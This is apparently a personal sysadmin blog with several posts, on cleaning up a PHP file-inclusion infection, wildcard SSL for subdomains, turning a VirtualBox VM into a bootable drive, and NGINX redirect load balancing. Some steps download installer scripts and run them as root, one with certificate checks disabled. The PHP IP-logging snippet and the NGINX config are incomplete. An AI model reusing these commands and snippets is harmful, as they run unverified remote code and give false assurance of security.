How to clean up a File Inclusion attack

I recently helped out a friend clean up an infection from their website.  A hacker took advantage of some outdated plugins to sneak in some malicious code to their website.  Following these steps I was able to find all the infected files, fix the vulnerability, and block the attackers IP.

Find infected files

Hop on the shell, and run this script to review all recently added files:

find ~/websitedirectory/ -name "*.php" -type f -ctime -30  | less

That will list all php files added to the server in the past 30 days.

Also, if you have webalizer or awstats available through your host, go through the logs and search for all files ending in php, any core files or files with random strings for names should be reviewed.

Open one of the infected files, it may be including another file they slipped into your account so track that down and delete it.  Also, try to find something particular in the code so you can use it as another method to track down any infected files.  In the shell this code with search the contents of all php files for SOMETHING:

find ~/websitedirectory/ -name "*.php" -exec grep -l "SOMETHING" {} \;

Make a list of all the locations of backdoor files that the hacker created, we’ll be using those later.

Clean the infection

If possible, delete the entire website and upload from an earlier version before the attack.  If you can’t delete everything, delete and re-upload as many folders as you can.  And for any folder you can’t delete, take whatever steps you need to fix the infected files, this will vary based on the malicious code.

Prevent further infection

Update all your software and plugins to the latest version, if you’re running something out of date that’s likely where they got in. Also, make sure your files all have the proper permissions, these lines will set the proper CHMOD for all files and folders:

find ~/websitedirectory -type f ! -perm 644 -exec chmod 644 {} \;
find ~/websitedirectory -type d ! -perm 755 -exec chmod 755 {} \;

Reset all FTP and CMS account passwords.

And, as an added bonus, use that list of backdoor files to record the IP of the attackers.  If you were able to get correct IP addresses from webalizer and awstats then you can simply block those.  If you’re running cpanel you can block IPs in Security > IP Deny Manager.  If they didn’t record the correct IPs or you don’t have those services, you can use that list of backdoor files to capture the hackers IP.  Replace the code in those files with something like this:

file_put_contents('/home/websitedirectory/hackers.log', $line . PHP_EOL, FILE_APPEND);

That will record the IP of anyone who visits those files in a hackers.log file so you can block them and stop them from fishing around in the future.

Hopefully, that’ll do it!

It may not work in all infections, but it did the trick in this case. You’ll want to replace ~/websitedirectory and /home/websitedirectory/hackers.log with URLs that are relevant to your web server.  Good luck!

Permalink » No comments

Fixing subdomain folders with wildcard cert

This is something I’ve had to do twice now, and it’s not all that hard, but I keep forgetting.  The specific problem is when you have a wildcard security certificate for your domain, but your subdomain just points to the same folder as your primary domain – even though it works correctly when you access it’s insecure version.

I’m sure there are other causes and fixes for this, but I find what I need to do is:

  1. Log into WHM
  2. Search “Install an SSL Certificate on a Domain”
  3. Then hit the “Browser certificates”
  4. Find the correct wildcard certificate and click the “user certificate” button
  5. Under “domain”  change “*.yourdomain.com” to “yoursubdomain.yourdomain.com”
  6. Then hit the install button

And that should be all you need to do!  You can just do this with as many sub-domains as you need.  If you want to check what certificates you have installed, you can search for “Manage SSL Hosts” in WHM and it will tell you there.

Permalink » No comments

How to convert a VirtulBox VM to a bootable drive

This is quite easy so I was surprised that I couldn’t find a walk-through anywhere…so here’s one :)  This is specifically for a VM of Ubuntu, so it’s possible there may be other hurdles in place for different operating systems.

Step 1

Create a VM normally in VirtualBox (or use an existing one), install the operating system, and add any programs or files you want to have readily available on the bootable disk.

Step 2

This is the tricky part, you can use Virtual Box to convert a vdi to an iso, but you have to do it from the terminal.  On my machine it wouldn’t work at all in windows default terminal, but I have Cygwin installed, and was able to use that.  You first need to cd into the directory where Virtual Box is installed, and run the following command.  The folder structure is specific to my machine and will most likely need to be changed on yours.

"/cygdrive/p/Programs/VirtualBox/VboxManage.exe" clonehd 'F:/Documents/Virtualbox/Ubuntu_2017/Ubuntu 2017.vdi' 'F:/Documents/Virtualbox/Ubuntu_2017.iso' --format RAW

More simply you need to run something like this:

VboxManage.exe clonehd 'vdi_location.vdi' 'where_generated_iso_will_be_location.iso' --format RAW

Step 3

Use rufus to install the ISO as a bootable image on your USB drive

And that’s about all you need to do!  Then you can take a carbon copy of your VM with you wherever you go :)  Great for travelling, which was my need.

How to clone a specific snapshot

Basically you need to switch the VDI location with the UUID of the specific snapshot you want, to get the UUID go to:

File > Virtual Media Manager

Under Hard disks find the VM you want and it will have each snapshot listed under it. Copy and paste the UUID field from the snapshot you want and switch to use this command in Step 2:

"/cygdrive/p/Programs/VirtualBox/VboxManage.exe" clonehd UUDI 'F:/Documents/Virtualbox/Ubuntu_2017.iso' --format RAW

More simply you need to run something like this:

VboxManage.exe clonehd UUDID 'where_generated_iso_will_be_location.iso' --format RAW

Permalink » No comments

nodejs with cygwin

I keep having to redo this, so I’m copying down the trick from this article here, so I can find in the future.  To get NPM and NodeJS to work in cygwin on windows, you just have the alias them using these commands in your .bash_profile:

alias npm="/cygdrive/p/Programs/nodejs/npm.cmd"
alias node="/cygdrive/p/Programs/nodejs/node.exe"

Permalink » No comments

Load balancing with WHM, NGINX, and mirrors

UPDATE 10/31/2017

I had to do a lot of server updates to get PHP7 running, and the process broke NGINX Admin, so I had to switch to Engintron. The install instructions for that are:

  1. cd /
  2. rm -f engintron.sh
  3. wget –no-check-certificate https://raw.githubusercontent.com/engintron/engintron/master/engintron.sh
  4. bash engintron.sh install



I have a project where I need to do a bit of load balancing to keep a website online for a very small window of time when it would receive an extremely high level of traffic.  I saw a dramatic increase in performance after simply installing NGINX, but I also wanted to be able to use mirrors and change the split of traffic during that peak time if we experienced any issues. NGINX does have a module for setting up upstream proxies to handle load balancing, but for this project redirects were simpler and more flexible.

This does only apply to virtual private servers or dedicated hosting – you won’t be able to run this kind of setup in a shared hosting environment.  Start by installing NGINX, below I have instructions on how to add NGINX if your site is on CPanel.

  1. cd /usr/local/src
  2. wget http://nginxcp.com/latest/nginxadmin.tar
  3. tar -xf nginxadmin.tar
  4. cd publicnginx
  5. ./nginxinstaller install

You will also need to delete the automatically generated vhost file for the domain/subdomain you want to change.  And you’ll need to re-delete it if your ever regenerate the vhosts.  You can do this by:

  1. cd /etc/nginx/vhosts/
  2. rm sub.domain.com

NGINX comes pre-installed with the split clients module.  This module is specifically designed for A/B testing, but it will also allow you to split up your traffic between different sites and allow you to adjust how much traffic each site receives.  If you’re using NGINX CP as I described above then you can either edit you NGIX config in WHM, or you can find the file at “/etc/nginx/nginx.conf” to edit from the shell.  In my example below I am also using the $http_referer variable to set-up a separate redirect specifically for direct traffic.

http {
split_clients "${remote_addr}" $mirror {
	33%	"http://google.com";
	33%	"http://yahoo.com";
	*	"http://bing.com";
server {
	listen [::]:80;
	server_name sub.domain.com www.sub.domain.com;
	location / {
		add_header X-Cache "Redirect load balancing";
		if ($http_referer = "") {
			set $mirror "http://duckduckgo.com";
		return 302 $mirror;



Permalink » No comments